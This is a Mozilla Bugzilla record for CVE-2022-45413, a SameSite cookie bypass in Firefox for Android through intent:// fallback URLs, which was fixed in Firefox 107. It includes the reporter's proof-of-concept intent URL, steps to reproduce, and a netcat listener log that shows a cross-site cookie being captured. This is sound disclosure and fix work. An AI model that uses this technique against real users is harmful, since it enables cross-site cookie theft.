Closed Bug 1791201 (CVE-2022-45413) Opened 2 years ago Closed 2 years ago

SameSite=Strict cookie bypass on Android via fallback URLs in intent:// scheme

Categories

(Fenix :: General, defect, P2)

Product:
Fenix
Component:
General
Platform:
Unspecified
Android
Type:
defect

Tracking

(firefox105 wontfix, firefox106 wontfix, firefox107 fixed)

Status:
RESOLVED FIXED
Tracking Flags:
Tracking Status
firefox105 --- wontfix
firefox106 --- wontfix
firefox107 --- fixed

People

(Reporter: haxatron1, Assigned: royang)

Details

(Keywords: csectype-other, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [geckoview:m107][adv-main107+])

Attachments

(2 files, 2 obsolete files)

simpler-poc.html
279 bytes, text/html
Details
advisory.txt
334 bytes, text/plain
Details
Attached file cookie.php (obsolete) —

SameSite=Strict cookies can be sent cross-site (without user interaction) via the intent URLs. Consider the following URL:

intent://192.168.1.70#Intent;scheme=http;package=garbage;S.browser_fallback_url=http://192.168.1.70:8000/cookie;end

On Android, the S.browser_fallback_url parameter specifies the URL to load when the browser fails to verify the intent. As the intent above is invalid due to the invalid package name, then Firefox browser will not open another app but instead open the URL http://192.168.1.70:8000/cookie.

When opening the fallback_url parameter, it doesn't take into account the passing of SameSite=Strict cookie, as such, an attacker can just redirect a user to the URL intent://192.168.1.70#Intent;scheme=http;package=garbage;S.browser_fallback_url=http://192.168.1.70:8000/cookie;end and the cookies will get passed on.

STR:

  1. Download attached files.
  2. Host cookie.php on Site A, intent-redirect.php on Site B. Remember to change the URL in intent-redirect.php to Site B!
  3. Visit cookie.php on Site A to retrieve SameSite cookies
  4. Open a listener on Site A, then visit intent-redirect.php on Site B
  5. The SameSite cookie gets sent to cross-site from Site B to Site A.
└─$ nc -nvlp 8000
listening on [any] 8000 ...
connect to [192.168.1.70] from (UNKNOWN) [192.168.1.127] 43784
GET /cookie HTTP/1.1
Host: 192.168.1.70:8000
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:104.0) Gecko/104.0 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: a=b
Upgrade-Insecure-Requests: 1
Flags: sec-bounty?
Attached file intent-redirect.php (obsolete) —
Group: firefox-core-security → mobile-core-security
Component: Security → Security: Android
Product: Firefox → Fenix
Attached file simpler-poc.html

Easier STR.
On Firefox Android,

  1. Download simpler-poc.html
  2. Set-cookie by clicking (1)
  3. Verify SameSite Strict cookie set by clicking (2), cookie should not be seen.
  4. SameSite Strict cookie should be sent on (3).
Attachment #9295084 - Attachment is obsolete: true
Attachment #9295085 - Attachment is obsolete: true

Actually, thinking about this now, it is a samesite=lax bypass too, as intent redirects are confirmed to work (so a user just needs to visit a malicious site to trigger the bypass)

Assignee: nobody → royang
Flags: needinfo?(royang)

Using the STR above, I can confirm that the cookie is sent cross-site. As Christian correctly pointed out, the loadUrl call in A-C should set the flag to external() to prevent this from happening. I've tested and it does indeed fixes this issue.

Question for Irene, should there also be a check that catches this in GV? Thanks

Severity: -- → S2
Status: UNCONFIRMED → NEW
Ever confirmed: true
Priority: -- → P2
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?] [geckoview:m107]

Roger, I looked at GV's code - we don't do anything about the cookies, flags or storage. All the related logic seems to be in Gecko. Seeing that this is related to Intents specifically, I would guess this is an AC issue.

Flags: needinfo?(bugzeeeeee)

Thanks, could this be marked as fixed (as the commit has been merged) or are there any secondary patches incoming?

Yes, this can be marked as fixed. I've confirmed on latest Nightly using simple-poc.html that this issue has been fixed. Thanks

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Group: mobile-core-security → core-security-release
status-firefox105: --- → wontfix
status-firefox106: --- → wontfix
status-firefox107: --- → fixed
status-firefox-esr102: --- → unaffected
Flags: sec-bounty? → sec-bounty+
Component: Security: Android → General
OS: Unspecified → Android
Whiteboard: [reporter-external] [client-bounty-form] [verif?] [geckoview:m107] → [reporter-external] [client-bounty-form] [verif?] [geckoview:m107][adv-main107+]
Alias: CVE-2022-45413
Group: core-security-release
status-firefox-esr102: unaffected → ---
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: